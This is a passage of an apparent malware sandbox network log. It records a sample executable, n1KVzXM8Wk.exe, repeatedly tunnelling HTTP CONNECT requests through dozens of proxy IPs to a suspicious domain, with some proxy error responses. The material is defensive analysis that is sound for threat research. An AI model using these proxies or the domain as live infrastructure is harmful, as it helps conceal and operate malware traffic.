                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:03.709297895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:15.756182909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1435192.168.2.454078103.174.236.63108016812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.539518118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1436192.168.2.45408714.103.26.5380006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.542443991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.882478952 CET339INHTTP/1.1 500 Internal Server Error
                                                                                                      Server: nginx/1.19.2
                                                                                                      Date: Fri, 23 Feb 2024 08:45:27 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 177
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>500 Internal Server Error</title></head><body><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.19.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1437192.168.2.451188162.214.227.68349426812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.542721987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.680205107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.684309006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1438192.168.2.451223188.164.193.178378426812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.550934076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.680179119 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.684318066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.683675051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:51.709286928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:15.756155968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1439192.168.2.451287198.27.82.14393826812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.571466923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.586097956 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1440192.168.2.45411237.46.241.247806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.576469898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.799213886 CET340INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.12.2
                                                                                                      Date: Fri, 23 Feb 2024 08:45:27 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Content-Length: 173
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1441192.168.2.451277147.45.43.212305196812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.580060959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.680337906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.684343100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.683675051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:51.709287882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1442192.168.2.454160104.16.143.127806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.589471102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.676934004 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:27 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1443192.168.2.451020194.233.78.142318936812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.605875969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.680377007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.684365988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.683687925 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1444192.168.2.454099161.189.182.14531286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.633908987 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Feb 23, 2024 09:45:28.011715889 CET147INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:27 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                      Server: squid/4.14
                                                                                                      Content-Length: 0
                                                                                                      Feb 23, 2024 09:45:28.457712889 CET628INHTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy50-HG100-1</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></html
                                                                                                      Data Raw:
                                                                                                      Data Ascii:
                                                                                                      Feb 23, 2024 09:45:28.460066080 CET628INHTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy54-HG100-1</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></html
                                                                                                      Data Raw:
                                                                                                      Data Ascii:


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1445192.168.2.454124176.98.81.8580806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.635853052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1446192.168.2.454121177.38.245.110557136812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.635992050 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1447192.168.2.454146198.12.255.53525336812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.636104107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.178697109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.680597067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.680857897 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.475240946 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.365928888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.178513050 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.681447983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1448192.168.2.451247191.243.46.2182836812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.636116982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.284420967 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1449192.168.2.453525133.232.65.171806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.636121988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.680404902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.684348106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1450192.168.2.451159162.214.163.187566436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.636121988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1451192.168.2.4541088.213.128.90200026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.651114941 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.963246107 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1452192.168.2.451141109.123.254.43515386812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.653136015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.697078943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.834652901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.834781885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1453192.168.2.45120645.181.123.2019996812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.656709909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.697115898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1454192.168.2.454152188.164.193.17885006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.671586990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.219063997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.834954977 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.943979025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.147047043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.334716082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.538156986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.834707022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1455192.168.2.45380188.80.103.968886812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.676176071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.680448055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.117927074 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1456192.168.2.450967194.233.78.142302956812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.676940918 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.697113991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1457192.168.2.4541725.9.98.14226366812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.681690931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1458192.168.2.451201179.60.235.25180966812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.682988882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.697145939 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.834654093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.834805965 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:51.834264040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:03.834295034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:15.908202887 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1459192.168.2.45412359.6.26.121806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.690798044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1460192.168.2.45133172.167.220.46130466812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:27.700859070 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.697140932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1461192.168.2.45113645.117.179.179331646812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
